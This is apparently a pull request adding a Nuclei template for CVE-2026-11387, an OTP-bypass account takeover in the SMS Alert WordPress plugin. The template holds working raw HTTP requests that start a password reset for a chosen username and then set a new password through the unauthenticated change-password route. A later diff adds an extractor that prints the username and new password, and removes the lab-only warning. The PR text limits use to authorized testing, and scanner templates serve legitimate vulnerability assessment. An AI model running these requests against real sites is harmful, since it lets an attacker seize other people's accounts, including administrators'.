### PR TITLE
Add CVE-2026-11387 SMS Alert WordPress password-reset bypass

### DIFF
--- a/http/cves/2026/CVE-2026-11387.yaml
+++ b/http/cves/2026/CVE-2026-11387.yaml
@@ -1,0 +1,62 @@
+id: CVE-2026-11387
+
+info:
+  name: SMS Alert <=3.9.5 - Password Reset OTP Bypass
+  author: str4k3r
+  severity: critical
+  description: |
+    SMS Alert <=3.9.5 starts a password-reset transaction for a phone-backed
+    WordPress user but accepts the public option=smsalert-change-password-form
+    request without checking that the OTP transaction reached the validated
+    state. A caller who knows a target username can start the reset flow and
+    then submit matching new-password fields; the vulnerable version resets the
+    account and redirects with password-reset=true. Version 3.9.6 requires the
+    per-session OTP validation marker before processing that route. This
+    detection changes the supplied lab account password and is intended only
+    for a disposable test deployment.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-11387
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c31906da-f2fd-40ac-86e0-3f1ed0409d0c?source=cve
+    - https://plugins.trac.wordpress.org/changeset/3587983/sms-alert
+    - https://wordpress.org/plugins/sms-alert/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-11387
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: cozyvision1
+    product: sms-alert
+  tags: cve,cve2026,wordpress,wp-plugin,sms-alert,auth-bypass,account-takeover
+
+variables:
+  username: ""
+  new_password: "CVE11387-{{rand_base(16)}}"
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php?action=lostpassword HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user_login={{url_encode(username)}}&wc_reset_password=1
+
+      - |
+        POST /?option=smsalert-change-password-form HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        option=smsalert-change-password-form&smsalert_user_newpwd={{url_encode(new_password)}}&smsalert_user_cnfpwd={{url_encode(new_password)}}
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+      - type: word
+        part: header
+        words:
+          - "password-reset=true"

--- a/http/cves/2026/CVE-2026-11387.yaml
+++ b/http/cves/2026/CVE-2026-11387.yaml
@@ -1,19 +1,15 @@
 id: CVE-2026-11387
 
 info:
-  name: SMS Alert <=3.9.5 - Password Reset OTP Bypass
+  name: SMS Alert – SMS & OTP for WooCommerce - Privilege Escalation
   author: str4k3r
   severity: critical
   description: |
-    SMS Alert <=3.9.5 starts a password-reset transaction for a phone-backed
-    WordPress user but accepts the public option=smsalert-change-password-form
-    request without checking that the OTP transaction reached the validated
-    state. A caller who knows a target username can start the reset flow and
-    then submit matching new-password fields; the vulnerable version resets the
-    account and redirects with password-reset=true. Version 3.9.6 requires the
-    per-session OTP validation marker before processing that route. This
-    detection changes the supplied lab account password and is intended only
-    for a disposable test deployment.
+    The SMS Alert – SMS & OTP for WooCommerce, Order Notifications & Abandoned Cart Recovery plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.9.5. This is due to the plugin not properly validating a user's identity prior to updating their details like reset the password of any user account, including administrators, and gain full access to those accounts. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. This is only vulnerable on sites with OTP verification for password resets enabled, and where the administrator (or other user) has set a phone number for OTP verification.
+  impact: |
+    Unauthenticated attackers can reset passwords and take over user accounts, including administrators, leading to full account compromise.
+  remediation: |
+    Update to the latest version of the plugin.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-11387
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/c31906da-f2fd-40ac-86e0-3f1ed0409d0c?source=cve
@@ -50,13 +46,20 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         option=smsalert-change-password-form&smsalert_user_newpwd={{url_encode(new_password)}}&smsalert_user_cnfpwd={{url_encode(new_password)}}
-    cookie-reuse: true
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 302
       - type: word
         part: header
         words:
           - "password-reset=true"
+
+      - type: status
+        status:
+          - 302
+
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Username: " + username + " | New Password: " + new_password'


### PR DESCRIPTION
## Vulnerability
SMS Alert 3.9.5 accepts the password-change branch of the lost-password workflow without validating a legitimate OTP. Version 3.9.6 validates the reset state before changing the password.

## Template behavior
The template submits the lost-password request and then submits the password-change action with the expected WordPress fields. It matches the successful reset redirect returned by a vulnerable installation.

## Required configuration
Set `username` to a disposable WordPress account. `new_password` can be supplied explicitly or left at the template-generated value. Run only where changing that account password is authorized.

## Impact
An unauthenticated attacker can take over a WordPress account by setting a new password without possessing the SMS verification code.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-11387.yaml -var username=<disposable-user> -var new_password=<temporary-password>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
